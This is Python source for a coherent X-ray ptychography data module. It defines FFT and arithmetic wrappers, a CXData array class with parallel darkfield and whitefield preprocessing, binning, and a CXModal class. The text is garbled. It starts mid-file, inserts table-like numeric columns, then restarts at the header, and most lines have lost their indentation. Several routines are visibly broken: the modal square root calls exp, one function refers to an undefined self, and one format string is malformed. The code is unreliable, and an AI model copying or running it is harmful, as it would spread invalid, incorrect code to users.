                # NOTE(review): CXData.raw_data_filename_string is not defined
                # anywhere in this file -- confirm it exists in the project.
                self.load(CXData.raw_data_filename_string.format('probe_det_mod'))
            try:
                # Apply the probe modulus constraint to an already-registered probe.
                probe = self.__class__.__all__['probe']
                probe.data[0] = spf.ifft2(self.data[0]*exp(complex(0., 1.)*sp.angle(spf.fft2(probe.data[0]))))
                CXP.log.info('Applied probe modulus constraint.')
            except (AttributeError, KeyError):
                pass

        elif args[0] == 'dark':
            if CXP.actions.preprocess_data:
                # Get list of dark files
                CXP.log.info('Preprocessing darkfield.')
                dfilename, dfilerange, dn_acqs = [CXP.io.darkfield_filename, CXP.io.darkfield_filename_range,
                                                  CXP.measurement.n_acqs_darkfield]
                self.pattern = dfilename.count('{')
                if self.pattern == 1:
                    df = [dfilename.format(i) for i in range(dfilerange[0], dfilerange[1])]
                elif self.pattern == 2:
                    df = [dfilename.format(dfilerange[0], i) for i in range(dn_acqs)]
                elif self.pattern == 3:
                    df = glob.glob(dfilename.split('}')[0]+'}*')
                res = self.preprocess_data_stack(0, 1, df, self.pattern, None, None, no_decorate=True)
                self.data = res[1]
            else:
                # NOTE(review): this loads 'probe_det_mod' in the 'dark'
                # branch -- looks like a copy-paste slip; confirm.
                self.load(CXData.raw_data_filename_string.format('probe_det_mod'))
    def read_in_data(self):
        """
        Read, group and preprocess all raw diffraction frames in parallel.

        Frames are grouped into per-position stacks (job_filenames), handed
        to a pool of worker processes via a JoinableQueue, and the processed
        results are collected back into self.data in job order.
        """
        self.completed_filenames = [] # Keep track of what's been processed already for online analysis
        self.job_filenames = [] # Bundle stack of images for preprocessing
        self.pattern = None
        # Determine which files to read in
        CXP.log.info('Reading in & preprocessing raw data...')
        #Pattern 1: 'image_{:d}.xxx'
        #Pattern 2: 'image_{:d}_{:d}.xxx'
        #Pattern 3: 'image_{:d}_{:d}_{val}.xxx'
        if self.pattern is None: # Pattern is not yet dertermined
            filename, filerange, n_acqs = [CXP.io.data_filename, CXP.io.data_filename_range, CXP.measurement.n_acqs_data]
            self.pattern = filename.count('{')
            CXP.log.info('Detected filename pattern: {:d}'.format(self.pattern))
        if self.pattern == 0:
            raise Exception('NamingConventionError:\nPlease read CXParams for more info on file naming conventions.')
        try:
            n0, n1 = filerange[0], filerange[1]+1
        except IndexError:
            # A single-element range means exactly one scan index.
            n0 = n1 = filerange[0]
        # NOTE(review): 'is not' compares identity against the interned empty
        # string here and below; '!=' would be the robust spelling.
        if CXP.io.darkfield_filename is not '': # dark
            try:
                dark = self.__class__.__all__['dark']
                CXP.log.info('Found darkfield.')
            except KeyError:
                dark = CXData(itype='dark')
                dark.save()
        else:
            CXP.log.info('Not processing darkfields.')
            dark = None
        if CXP.io.whitefield_filename is not '': # white
            try:
                probe_det_mod = self.__class__.__all__['probe_det_mod']
                CXP.log.info('Found probe detector modulus.')
            except KeyError:
                probe_det_mod = CXData(itype='probe_det_mod')
                probe_det_mod.save()
        else:
            CXP.log.info('Not processing whitefields.')
            probe_det_mod = None
        # Silence per-frame logging while the workers run.
        old_verbosity = CXP.reconstruction.verbose
        CXP.reconstruction.verbose = False
        jobs = mp.JoinableQueue()
        results = mp.Queue()
        n_processes = mp.cpu_count()
        then = time.time()
        cnt=0
        missing_frames = False
        l=[]
        CXP.log.info('Dividing raw data into jobs over {:d} processes.'.format(n_processes))
        for i in range(n0, n1):
            if self.pattern == 1:
                s = [filename.format(i)]
            else:
                s = glob.glob((filename.split('}')[0]+'}*').format(i))
            # Include only files that haven't been processed yet
            # s = [fn for fn in s if fn not in self.completed_filenames]
            if len(s)==0:
                CXP.log.error('Globbed 0 files in CXData@read_in_files')
                sys.exit(1)
            if self.pattern==1:
                # Pattern 1: bundle n_acqs consecutive frames per job.
                try:
                    s=s[0]
                    self.completed_filenames.append(s)
                    if cnt<n_acqs:
                        l.append(s)
                        cnt+=1
                    if cnt>=n_acqs:
                        self.job_filenames.append(l)
                        cnt=0
                        l=[]
                except IndexError:
                    missing_frames = True
                    CXP.log.error('Missing frame: {:s}'.format(filename.format(i)))
            else:
                # Patterns 2/3: everything globbed for index i is one job.
                self.completed_filenames+=s
                self.job_filenames.append(s)
        if missing_frames:
            print "There were missing frames. Choose 'c' to continue or 'q' to quit."
            pdb.set_trace()
        p = [mp.Process(target=self.preprocess_data_stack, args=(jobs, results))
             for i in range(n_processes)]
        for process in p:
            process.start()
        n_jobs = len(self.job_filenames)
        for i in range(n_jobs):
            jobs.put((i, n_jobs, self.job_filenames[i], self.pattern, probe_det_mod, dark))
        # Add Poison Pill
        for i in range(n_processes):
            jobs.put((None, None, None, None, None, None))
        CXP.log.info('{:3.2f} seconds elapsed dividing jobs between processes.'.format(time.time()-then))
        then = time.time()
        cnt = 0
        self.data = [None]*n_jobs
        # Drain the results queue; jobs come back in arbitrary order, so the
        # job index i restores the original ordering.
        while True:
            if not results.empty():
                i, data = results.get()
                self.data[i] = data[0]
                cnt+=1
            elif cnt==n_jobs:
                break
        jobs.join()
        jobs.close()
        results.close()
        for process in p:
            process.join()
        CXP.log.info('{:3.2f} seconds elapsed preprocessing data.'.format(time.time()-then))
        CXP.reconstruction.verbose = old_verbosity
        #self._sequence_dir = '/'.join([CXP.io.base_dir, CXP.io.scan_id, 'sequences'])
        #self._cur_sequence_dir = self._sequence_dir+'/sequence_{:d}'.format(CXP.reconstruction.sequence)
        #self.save(path=self._cur_sequence_dir+'/det_mod.npy')
@worker
def preprocess_data_stack(self, stack_num, n_jobs, file_list, pattern, white, dark):
# Average, merge and preprocess a stack of images
# Typically a stack corresponds to one ptychographic position
l=[]
tmp=None
# First - average according to the pattern
if pattern in [1, 2]:
# Averaging only
for filename in file_list:
if tmp is None:
tmp = self.openup(filename)
else:
tmp += self.openup(filename)
l.append(tmp/len(file_list))
elif pattern == 3:
# Average then merge
d={}
unique_times = list(set([t.split('_')[3] for t in file_list]))
for filename in file_list:
t = filename.split('.')[0].split('_')[-1]
if t not in d.keys():
d[t] = (1, self.openup(filename))
else:
d[t][0] += 1
d[t][1] += self.openup(filename)
for key, (i, val) in d.iteritems():
val /= i
# Check for saturated values and merge variable exposure times
max_time = max(unique_times)
if CXP.preprocessing.saturation_level>0:
for key in d.keys():
wh = sp.where(d[key]>=CXP.preprocessing.saturation_level)
d[key][wh] = 0
if tmp == 0:
tmp = d[key] * max_time/float(key)
else:
tmp += d[key] * max_time/float(key)
l.append(tmp)
else:
raise Exception('NamingConventionError')
# Do preprocessing
data = CXData()
data.data = l
if CXP.measurement.beam_stop:
data.treat_beamstop()
data.symmetrize_array_shape()
# CCD Specific Preprocessing
if CXP.preprocessing.detector_type == 'ccd':
try:
# Dark field correction
if dark is not None:
print('Dark field correcting data')
data-=dark
# Dark correct white field
if white is not None:
print('Dark field correcting whitefield')
white-=dark
except UnboundLocalError:
print('No darkfield subtraction performed.')
# PAD Specific Preprocessing
elif CXP.preprocessing.detector_type == 'pad':
pass
# Threshhold data
if CXP.preprocessing.threshhold_raw_data > 0:
data.threshhold()
if white is not None:
white.threshhold()
# Bin data
if CXP.preprocessing.bin > 1:
data.bin()
if white is not None:
white.bin()
if CXP.preprocessing.rot90!=0:
data.rot90(CXP.preprocessing.rot90)
if white is not None:
white.rot90(CXP.preprocessing.rot90)
# Take square root
data.square_root()
if white is not None:
white.square_root()
# Put in FFT shifted
data.fft_shift()
if white is not None:
white.fft_shift()
return (stack_num, data.data)
def bin(self, n=None):
"""
Bin a square array by grouping nxn pixels.
Array size must be a multiple of n.
"""
if n is None:
n=CXP.preprocessing.bin
# Now the detector pixel size has changed so we should update that
CXP.experiment.dx_d *= n
CXP.log.info('After binning new detector pixel size: {2.2e}'.format(CXP.experiment.dx_d))
nx, ny = self.data[0].shape[0], self.data[0].shape[1]
if not nx==ny:
raise Exception('Array to be binned must be square')
if not sp.mod(nx, n)==0.:
raise Exception('Array size must be a multiple of binning factor')
if n>nx:
raise Exception('Binning factor must be smaller than array size')
nn = nx/n
l = []
for i in xrange(len(self.data)):
tmp = sp.zeros((nn, nn))
for p in xrange(nn):
for q in xrange(nn):
tmp[p, q] = sp.sum(self.data[i][p*n:(p+1)*n, q*n:(q+1)*n])
l.append(tmp)
self.data=l
def show(self, i=0, phase=False, log=False):
if phase:
pylab.matshow(angle(self.data[i]), cmap=cm.hsv)
else:
if log:
pylab.matshow(sp.log10(abs(self.data[i])))
else:
pylab.matshow(abs(self.data[i]))
pylab.colorbar()
pylab.show()
def plot(self, i=0, phase=False):
pylab.figure()
if phase:
pylab.plot(np.angle(self.data[i][:, self.data[i].shape[0]/2]), label='Horizontal')
pylab.plot(np.angle(self.data[i][self.data[i].shape[1]/2, :]), label='Vertical')
else:
pylab.plot(np.abs(self.data[i][:, self.data[i].shape[0]/2]), label='Horizontal')
pylab.plot(np.abs(self.data[i][self.data[i].shape[1]/2, :]), label='Vertical')
pylab.legend()
def copy(self):
return CXData(data=[np.copy(arr) for arr in self.data])
class CXModal(object):
def __init__(self, *args, **kwargs):
self.modes = []
self.savepath = None
for kw in kwargs:
# Data attribute must be a list of arrays
if kw=='modes':
if isinstance(kwargs['modes'], list):
self.modes = kwargs['modes']
elif isinstance(kwargs['modes'], CXData):
self.modes = [kwargs['modes']]
else:
setattr(self, kw, kwargs[kw])
def __repr__(self):
try:
s=repr(self.modes[0].data[0])
except:
s=''
try:
return '<{} at {}>\n{:d} modes containing {:d} arrays ({:d}x{:d}px).\n{}'.format(self.__class__,
hex(id(self)), len(self.modes), len(self.modes[0]), self.modes[0].data[0].shape[0],
self.modes[0].data[0].shape[1], s)
except AttributeError:
return '<{} at {}>\nNo modes attribute present.'.format(self.__class__, hex(id(self)))
def __getitem__(self, s):
return self.modes[s]
def __setitem__(self, s, modes):
self.modes[s] = modes
@staticmethod
def _addsubmuldiv(operation, this, other):
if isinstance(other, CXModal):
l=[]
for mode in xrange(len(this.modes)):
l.append(CXData(data=[operation(this.modes[mode].data[i], other.modes[mode].data[i]) for i in range(len(this.modes[mode].data))]))
return CXModal(modes=l)
elif isinstance(other, CXData):
l=[]
for mode in xrange(len(this.modes)):
l.append(CXData(data=[operation(this.modes[mode].data[i], other.data[i]) for i in range(len(this.modes[mode].data))]))
return CXModal(modes=l)
elif isinstance(other, (int, float, complex)):
l=[]
for mode in xrange(len(this.modes)):
l.append(CXData(data=[operation(this.modes[mode].data[i], other) for i in range(len(this.modes[mode].data))]))
return CXModal(modes=l)
@staticmethod
def _iaddsubmuldiv(operation, this, other):
if isinstance(other, CXModal):
for mode in xrange(len(this.modes)):
for i in range(len(this.modes[mode])):
this.modes[mode].data[i]=operation(this.modes[mode].data[i], other.modes[mode].data[i])
return this
elif isinstance(other, CXData):
for mode in xrange(len(this.modes)):
for i in range(len(this.modes[mode])):
this.modes[mode].data[i] = operation(this.modes[mode].data[i], other.data[i])
return this
elif isinstance(other, (int, float, complex)):
for mode in xrange(len(this.modes)):
for i in range(len(this.modes[mode])):
this.modes[mode].data[i] = operation(this.modes[mode].data[i], other)
return this
def __add__(self, other):
return CXModal._addsubmuldiv(operator.add, self, other)
def __radd__(self, other):
return CXModal._addsubmuldiv(operator.add, self, other)
def __iadd__(self, other):
return CXModal._iaddsubmuldiv(operator.iadd, self, other)
def __sub__(self, other):
return CXModal._addsubmuldiv(operator.sub, self, other)
def __rsub__(self, other):
return CXModal._addsubmuldiv(operator.sub, other, self)
def __isub__(self, other):
return CXModal._iaddsubmuldiv(operator.isub, self, other)
def __mul__(self, other):
return CXModal._addsubmuldiv(operator.mul, self, other)
def __rmul__(self, other):
return CXModal._addsubmuldiv(operator.mul, self, other)
def __imul__(self, other):
return CXModal._addsubmuldiv(operator.imul, self, other)
def __div__(self, other):
return CXModal._addsubmuldiv(operator.div, self, other)
def __rdiv__(self, other):
return CXModal._addsubmuldiv(operator.div, self, other)
def __idiv__(self, other):
return CXModal._addsubmuldiv(operator.idiv, self, other)
def __pow__(self, power):
return CXModal(modes=[self.modes[mode]**power for mode in range(len(self.modes))])
def __len__(self):
return len(self.modes)
def copy(self):
return CXModal(modes=[self.modes[mode].copy() for mode in range(len(self))])
@staticmethod
def modal_sum(modal):
return CXData(data=[ reduce(CXData.__add__, [ modal[mode][i] for mode in range(len(modal.modes)) ]).data[0] for i in range(len(modal[0].data))])
def getat(self, i):
"""
.. method::setat(self, i)
return all modes at position i
"""
return CXModal(modes=[self.modes[mode][i] for mode in range(len(self))])
def setat(self, i, modal):
"""
.. method::getat(self, i)
set all modes at position i
"""
for mode in range(len(self)):
self.modes[mode][i] = modal.modes[mode][0]
def normalise(self):
mode_sum_max = CXModal.modal_sum(abs(self)).data[0].max()
for mode in range(len(self)):
self.modes[mode] /= mode_sum_max
    def orthogonalise(self):
        # Classical Gram-Schmidt orthogonalisation of the modes at stack
        # position 0: the first mode is kept as-is, and each subsequent mode
        # has its projection onto every previously orthogonalised mode
        # removed.  Note the projection is always taken of the *original*
        # mode self[i][0] (classical GS), not of the running remainder.
        ortho = CXModal(modes=self[0][0].copy())
        for i in range(1, len(self)):
            tmp = self[i][0].copy()
            for j in range(i-1, -1, -1):
                tmp -= CXData.proj_u_v(ortho[j][0], self[i][0])
            ortho.modes.append(tmp)
return CXModal(modes=ortho.modes) | 33.571193 | 152 | 0.539312 | """
.. module:: CXData2.py
:platform: Unix
:synopsis: A class for coherent X-ray phasing data.
.. moduleauthor:: David Vine <djvine@gmail.com>
"""
import scipy as sp
import numpy as np
import scipy.fftpack as spf
import scipy.ndimage as spn
from numpy.random import uniform
from numpy import pad
import os
import pdb
import pylab
import shutil
import sys
import operator
from round_scan import round_roi
import glob
import multiprocessing as mp
import time
from matplotlib import cm
from images2gif import writeGif
from CXFileReader import CXFileReader
from cxparams import CXParams as CXP
debug = True
def fft2(x):
if isinstance(x, CXData):
l=[]
for i in xrange(len(x)):
l.append(spf.fft2(x.data[i]))
return CXData(data=l)
elif isinstance(x, CXModal):
l=[]
for mode in range(len(x.modes)):
l.append(fft2(x.modes[mode]))
return CXModal(modes=l)
elif isinstance(x, np.ndarray):
return spf.fft2(x)
else:
raise Exception('Unknown data type passed to fft2')
def ifft2(x):
if isinstance(x, CXData):
l=[]
for i in xrange(len(x)):
l.append(spf.ifft2(x.data[i]))
return CXData(data=l)
elif isinstance(x, CXModal):
l=[]
for mode in range(len(x.modes)):
l.append(ifft2(x.modes[mode]))
return CXModal(modes=l)
elif isinstance(x, np.ndarray):
return spf.ifft2(x)
else:
raise Exception('Unknown data type passed to ifft2')
def fftshift(x):
if isinstance(x, CXData):
l=[]
for i in xrange(len(x)):
l.append(spf.fftshift(x.data[i]))
return CXData(data=l)
elif isinstance(x, np.ndarray):
return spf.fftshift(x)
else:
raise Exception('Unknown data type passed to fftshift')
def abs(x):
if isinstance(x, CXData):
l=[]
for i in xrange(len(x)):
l.append(np.abs(x.data[i]))
return CXData(data=l)
elif isinstance(x, CXModal):
l=[]
for mode in range(len(x.modes)):
l.append(abs(x.modes[mode]))
return CXModal(modes=l)
elif isinstance(x, np.ndarray):
return np.abs(x)
else:
raise Exception('Unknown data type passed to abs')
def angle(x):
if isinstance(x, CXData):
l=[]
for i in xrange(len(x)):
l.append(sp.angle(x.data[i]))
return CXData(data=l)
elif isinstance(x, np.ndarray):
return sp.angle(x)
else:
raise Exception('Unknown data type passed to angle')
def exp(x):
if isinstance(x, CXData):
l=[]
for i in xrange(len(x)):
l.append(sp.exp(x.data[i]))
return CXData(data=l)
elif isinstance(x, np.ndarray):
return sp.exp(x)
else:
raise Exception('Unknown data type passed to exp')
def log(x):
if isinstance(x, CXData):
l=[]
for i in xrange(len(x)):
l.append(sp.log(x.data[i]))
return CXData(data=l)
elif isinstance(x, np.ndarray):
return sp.log(x)
else:
raise Exception('Unknown data type passed to log')
def conj(x):
"""
Wrapper for conjugate on a CXData object.
"""
if isinstance(x, CXData):
l=[]
for i in xrange(len(x)):
l.append(sp.conj(x.data[i]))
return CXData(data=l)
elif isinstance(x, CXModal):
l=[]
for mode in range(len(x.modes)):
l.append(conj(x.modes[mode]))
return CXModal(modes=l)
elif isinstance(x, np.ndarray):
return sp.conj(x)
else:
raise Exception('Unknown data type passed to conj')
def sqrt(x):
"""
Wrapper for square root on a CXData object.
"""
if isinstance(x, CXData):
l=[]
for i in xrange(len(x)):
l.append(sp.sqrt(x.data[i]))
return CXData(data=l)
elif isinstance(x, CXModal):
l=[]
for mode in range(len(x.modes)):
l.append(exp(x.modes[mode]))
return CXModal(modes=l)
elif isinstance(x, (int, float, complex, np.ndarray)):
return sp.sqrt(x)
else:
raise Exception('Unknown data type passed to sqrt')
def sum(x):
"""
Sum over arrays.
"""
if isinstance(x, CXData):
l=[]
for i in xrange(len(x)):
if i==0:
l.append(x.data[0])
else:
l[0] += x.data[i]
return CXData(data=l)
elif isinstance(x, CXModal):
l=[]
for mode in range(len(self.modes)):
l.append(sum(self.modes[mode]))
return CXModal(modes=l)
elif isinstance(x, np.ndarray):
return sp.sum(x)
else:
raise Exception('Unknown data type pass to sum')
def worker(func):
def worker2(self=None, *args, **kwargs):
try:
kwargs['no_decorate']
return func(self, args[0], args[1], args[2], args[3], args[4], args[5])
except KeyError:
cnt = 0
jobs, results = args[0], args[1]
while True:
job_args = jobs.get()
if job_args[0]==None:
print '{}: Exiting. {:d} jobs completed.'.format(mp.current_process().name, cnt)
jobs.task_done()
break
if job_args[0]%np.floor(job_args[1]/10)==0:
print 'Processed {:d} out of {:d} files.'.format(job_args[0], job_args[1])
res = func(self, *job_args)
cnt+=1
jobs.task_done()
results.put(res)
return worker2
return worker2
class CXData(CXFileReader):
"""
Defines a class for holding and interacting with coherent x-ray data.
...
Attributes
----------
data: list
list of complex arrays that hold all of the phase retrieval data.
name: str
name of instance. Used for logging.
savepath: str
location where this data should be saved.
Methods
-------
"""
def __init__(self, *args, **kwargs):
self.data = None
self.savepath = None
for kw in kwargs:
if kw=='data':
if isinstance(kwargs['data'], list):
self.data = kwargs['data']
elif isinstance(kwargs['data'], np.ndarray):
self.data = [kwargs['data']]
else:
setattr(self, kw, kwargs[kw])
def __repr__(self):
try:
s=repr(self.data[0])
except:
s=''
try:
return '<{} at {}>\n{} arrays ({:d}x{:d}px).\n{}'.format(self.__class__,
hex(id(self)), len(self.data), self.data[0].shape[0], self.data[0].shape[1], s)
except AttributeError:
return '<{} at {}>\nNo data attribute present.'.format(self.__class__, hex(id(self)))
def __add__(self, other):
if isinstance(other, CXData):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]+other.data[i])
return CXData(data=l)
elif isinstance(other, (int, float, complex)):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]+other)
return CXData(data=l)
elif isinstance(other, CXModal):
return CXModal.__add__(other, self)
def __iadd__(self, other):
if isinstance(other, CXData):
for i in xrange(len(self.data)):
self.data[i]+=other.data[i]
return self
elif isinstance(other, (int, float, complex)):
for i in xrange(len(self.data)):
self.data[i]+=other
return self
elif isinstance(other, CXModal):
raise("The meaning of += is ambiguous for these datatypes")
def __sub__(self, other):
if isinstance(other, CXData):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]-other.data[i])
return CXData(data=l)
elif isinstance(other, (int, float, complex)):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]-other)
return CXData(data=l)
elif isinstance(other, CXModal):
return CXModal.__sub__(other, self)*-1.0
def __isub__(self, other):
if isinstance(other, CXData):
for i in xrange(len(self.data)):
self.data[i]-=other.data[i]
return self
elif isinstance(other, (int, float, complex)):
for i in xrange(len(self.data)):
self.data[i]-=other.data
return self
elif isinstance(other, CXModal):
raise("The meaning of -= is ambiguous for these datatypes")
def __pow__(self, power):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]**power)
return CXData(data=l)
def __mul__(self, other):
if isinstance(other, CXData):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]*other.data[i])
return CXData(data=l)
elif isinstance(other, (int, float, complex)):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]*other)
return CXData(data=l)
elif isinstance(other, CXModal):
return CXModal.__mul__(other, self)
def __rmul__(self, other):
return self.__mul__(other)
def __imul__(self, other):
if isinstance(other, CXData):
for i in xrange(len(self.data)):
self.data[i]*=other.data[i]
return self
elif isinstance(other, (int, float, complex)):
for i in xrange(len(self.data)):
self.data[i]*=other
return self
elif isinstance(other, CXModal):
raise("The meaning of *= is ambiguous for these datatypes")
def __div__(self, other):
if isinstance(other, CXData):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]/other.data[i])
return CXData(data=l)
elif isinstance(other, (int, float, complex)):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]/other)
return CXData(data=l)
elif isinstance(other, CXModal):
raise("The meaning of / is ambiguous for these datatypes")
def __rdiv__(self, other):
return self.__mul__(other)
def __idiv__(self, other):
if isinstance(other, CXData):
for i in xrange(len(self.data)):
self.data[i]/=other.data[i]
return self
elif isinstance(other, (int, float, complex)):
for i in xrange(len(self.data)):
self.data[i]/=other
return self
elif isinstance(other, CXModal):
raise("The meaning of /= is ambiguous for these datatypes")
def __len__(self):
return len(self.data)
def __del__(self):
try:
print 'Deleting {}'.format(self.kwargs['itype'])
CXData.__all__.pop(self.kwargs['itype'])
except (AttributeError, KeyError):
pass
def __getitem__(self, s):
"""
Allows extracting a subarray from self.data or a single array from a list of arrays.
Implements subpixel shifting for seamless indexing of a fractional number of pixels.
The returned array must be an integer number of pixels.
E.g a[0:100.6] doesn't make any sense
but a[0.6:100.6] does.
a[0] is equivalent to a.data[0]
"""
if isinstance(s, int):
return CXData(data=self.data[s])
else:
y, x = s
xstart = x.start or 0
xstop = x.stop or self.data[0].shape[0]-1
ystart = y.start or 0
ystop = y.stop or self.data[0].shape[1]-1
dx, dy = -np.mod(xstart, 1), -np.mod(ystart, 1)
l = []
for data in self.data:
l.append(self.shift(data[xstart // 1:xstop // 1, ystart //1: ystop //1], dx, dy))
return CXData(data=l)
def __setitem__(self, s, arr):
"""
Embed a smaller array in a larger array.
a[s] = arr
"""
if isinstance(s, int):
if len(arr)>1:
raise Exception('Cannot set single array with list of arrays.')
self.data[s]=arr.data[0]
else:
y, x = s
xstart = x.start or 0
xstop = x.stop or self.data[0].shape[0]-1
ystart = y.start or 0
ystop = y.stop or self.data[0].shape[1]-1
dx, dy = np.mod(xstart, 1), np.mod(ystart, 1)
l=[]
if isinstance(arr, CXData):
for i, data in enumerate(self.data):
l.append(data.copy())
l[i][xstart // 1:xstop // 1, ystart //1: ystop //1] = self.shift(arr.data[i], dx, dy)
self.data = l
elif isinstance(arr, np.ndarray):
for i, data in enumerate(self.data):
l.append(data.copy())
l[i][xstart // 1:xstop // 1, ystart //1:ystop //1] = self.shift(arr, dx, dy)
self.data = l
elif isinstance(arr, (int, float)):
for i, data in enumerate(self.data):
l.append(data.copy())
l[i][xstart // 1:xstop // 1, ystart //1: ystop //1] = arr
l[i] = self.shift(l[i], dx, dy)
self.data = l
@staticmethod
def inner_product(u, v):
return sp.sum((conj(u)*v).data[0])/(u.data[0].shape[0]*u.data[0].shape[1])
@staticmethod
def proj_u_v(u, v):
return u*(CXData.inner_product(v, u)/CXData.inner_product(u, u))
def max(self):
"""
Return a list of maximum (absolute) value(s) of (complex) array(s).
"""
if len(self.data)==1:
return abs(self.data[0]).max()
else:
return [abs(element).max() for element in self.data]
def min(self):
"""
Return a list of minimum (absolute) value(s) of (complex) array(s).
"""
if len(self.data)==1:
return abs(self.data[0]).min()
else:
return [abs(element).min() for element in self.data]
def normalise(self, val=1.):
"""
Rebase data from 0 to 1.
"""
if CXP.reconstruction.verbose:
CXP.log.info('Rebasing data from 0 to {:3.2f}'.format(val))
for i in xrange(len(self.data)):
self.data[i] -= abs(self.data[i]).min()
self.data[i] /= abs(self.data[i]).max()
self.data[i] *= val
def append(self, other):
if isinstance(other, CXData):
for data in other.data:
self.data.append(data)
elif isinstance(other, np.ndarray):
self.data.append(other)
def square_root(self):
if CXP.reconstruction.verbose:
CXP.log.info('Taking square root.')
for i in xrange(len(self.data)):
self.data[i] = pow(self.data[i], 0.5)
def fft_shift(self):
if CXP.reconstruction.verbose:
CXP.log.info('Performing FFT shift.')
for i in xrange(len(self.data)):
self.data[i] = spf.fftshift(self.data[i])
def len(self):
return len(self.data)
@staticmethod
def shift_inner(arr, nx, ny, window=False, padding='reflect'):
"""
Shifts an array by nx and ny respectively.
"""
if ((nx % 1. == 0.) and (ny % 1. ==0)):
return sp.roll(sp.roll(arr, int(ny), axis=0),
int(nx), axis=1)
else:
atype = arr.dtype
if padding:
x, y = arr.shape
pwx, pwy = int(pow(2., np.ceil(np.log2(1.5*arr.shape[0])))), int(pow(2., np.ceil(np.log2(1.5*arr.shape[1]))))
pwx2, pwy2 = (pwx-x)/2, (pwy-y)/2
if pad=='zero':
arr = pad.with_constant(arr, pad_width=((pwx2, pwx2), (pwy2, pwy2)))
else:
arr = pad.with_reflect(arr, pad_width=((pwx2, pwx2), (pwy2, pwy2)))
phaseFactor = sp.exp(complex(0., -2.*sp.pi)*(ny*spf.fftfreq(arr.shape[0])[:, np.newaxis]+nx*spf.fftfreq(arr.shape[1])[np.newaxis, :]))
if window:
window = spf.fftshift(CXData._tukeywin(arr.shape[0], alpha=0.35))
arr = spf.ifft2(spf.fft2(arr)*phaseFactor*window)
else:
arr = spf.ifft2(spf.fft2(arr)*phaseFactor)
if padding:
arr = arr[pwx/4:3*pwx/4, pwy/4:3*pwy/4]
if atype == 'complex':
return arr
else:
return np.real(arr)
@staticmethod
def shift(x, nx, ny, **kwargs):
if isinstance(x, CXData):
l=[]
for data in x.data:
l.append(CXData.shift_inner(data.copy(), nx, ny, **kwargs))
return CXData(data=l)
elif isinstance(x, np.ndarray):
return CXData.shift_inner(x, nx, ny)
def ishift(self, nx, ny, **kwargs):
# Inplace version of shift
l=[]
for data in self.data:
for data in self.data:
l.append(self.shift_inner(data.copy(), nx, ny, kwargs))
self.data = l
return self
def rot90(self, i):
# Rotate by 90 degrees i times
if CXP.reconstruction.verbose:
CXP.log.info('Rotating data by {:d}'.format(i*90))
for j, data in enumerate(self.data):
self.data[j] = sp.rot90(data, i)
def find_dead_pixels(self):
# Return coordinates of pixels with a standard deviation of zero
dead_pix = sp.where(abs(np.std(self.data, axis=0))<machine_precision)
if CXP.reconstruction.verbose:
CXP.log.info('Found {0:d} dead pixels'.format(len(dead_pix)))
return dead_pix
def zero_dead_pixels(self):
if CXP.reconstruction.verbose:
CXP.log.info('Setting dead pixels to zero')
self.data[self.find_dead_pixels()]=0.
def threshhold(self, threshhold=None):
if not threshhold:
threshhold = CXP.preprocessing.threshhold_raw_data
if CXP.reconstruction.verbose:
CXP.log.info('Applying threshhold to data at {:3.2f} and rebasing to 0.'.format(threshhold))
for i, data in enumerate(self.data):
tdata = sp.where(data<threshhold, threshhold, data)
tdata-=tdata.min()
self.data[i]=tdata
def symmetrize_array_shape(self, qxqy0=None, desired_shape=None):
x0, y0 = self.data[0].shape
if desired_shape is None:
desired_shape = CXP.preprocessing.desired_array_shape
if qxqy0 is None:
qx, qy = CXP.preprocessing.qx0qy0
else:
qx, qy = qxqy0
if CXP.reconstruction.verbose:
CXP.log.info('Symmetrizing array shape.\n\tCurrent shape:\t{}x{}\n\tNew shape:\t{}x{}\n\tCentred on:\t{},{}'.format(
x0, y0, desired_shape, desired_shape, qx, qy))
# Cropping or padding?
qx_lower, qx_upper = qx-desired_shape/2, qx+desired_shape/2
qy_lower, qy_upper = qy-desired_shape/2, qy+desired_shape/2
if qx_lower<0: # Crop
nxl, mxl = np.abs(qx_lower), 0
else: # Pad
nxl, mxl = 0, qx_lower
if qy_lower<0: # Crop
nyl, myl = np.abs(qy_lower), 0
else: # Pad
nyl, myl = 0, qy_lower
if qx_upper<x0: # Crop
nxu, mxu = desired_shape, qx+desired_shape/2
else: # Pad
nxu, mxu = x0-qx_lower, x0
if qy_upper<y0: # Crop
nyu, myu = desired_shape, qy+desired_shape/2
else: # Pad
nyu, myu = y0-qy_lower, y0
for i in range(len(self.data)):
tmp = sp.zeros((desired_shape, desired_shape))
tmp[nxl:nxu, nyl:nyu] = self.data[i][mxl:mxu, myl:myu]
self.data[i] = tmp
CXP.p = CXP.preprocessing.desired_array_shape
def treat_beamstop(self):
factor = CXP.measurement.beam_stop_factor.keys()[0]
x0, y0 = CXP.measurement.beam_stop_factor[factor][0]
x1, y1 = CXP.measurement.beam_stop_factor[factor][1]
for i in range(len(self.data)):
self.data[i][x0:x1, y0:y1]*=factor
def save(self, path=None):
if path:
filepath = path
else:
filepath = self.savepath
try:
CXP.log.info('Saving {} to:\n\t{}'.format(self.name, filepath))
except AttributeError:
CXP.log.info('Saving to:\n\t{}'.format(filepath))
try:
np.savez(filepath, *self.data)
except IOError as e:
CXP.log.error(e)
raise Exception('Could not save {} to {}'.format(self.kwargs['name'], path))
def load(self, path=None):
if path:
filepath = path
else:
filepath = self.filename
CXP.log.info('Loading data from:\n\t{}'.format(filepath))
try:
self.data = self.openup(filepath)
except IOError as e:
CXP.log.error(e)
raise Exception('Could not load file from {}'.format(filepath))
if not isinstance(self.data, list):
self.data = [self.data]
def init_data(self, *args, **kwargs):
if args[0] == 'det_mod':
if CXP.actions.preprocess_data:
self.read_in_data()
else:
self.load()
elif args[0] == 'probe_det_mod':
if CXP.actions.preprocess_data:
# Get list of white files
CXP.log.info('Preprocessing probe detector modulus.')
if CXP.io.whitefield_filename not in [None, '']: # If whitefields were measured
wfilename, wfilerange, wn_acqs = [CXP.io.whitefield_filename, CXP.io.whitefield_filename_range,
CXP.measurement.n_acqs_whitefield]
self.pattern = wfilename.count('{')
if self.pattern == 1:
wf = [wfilename.format(i) for i in range(wfilerange[0], wfilerange[1])]
elif self.pattern == 2:
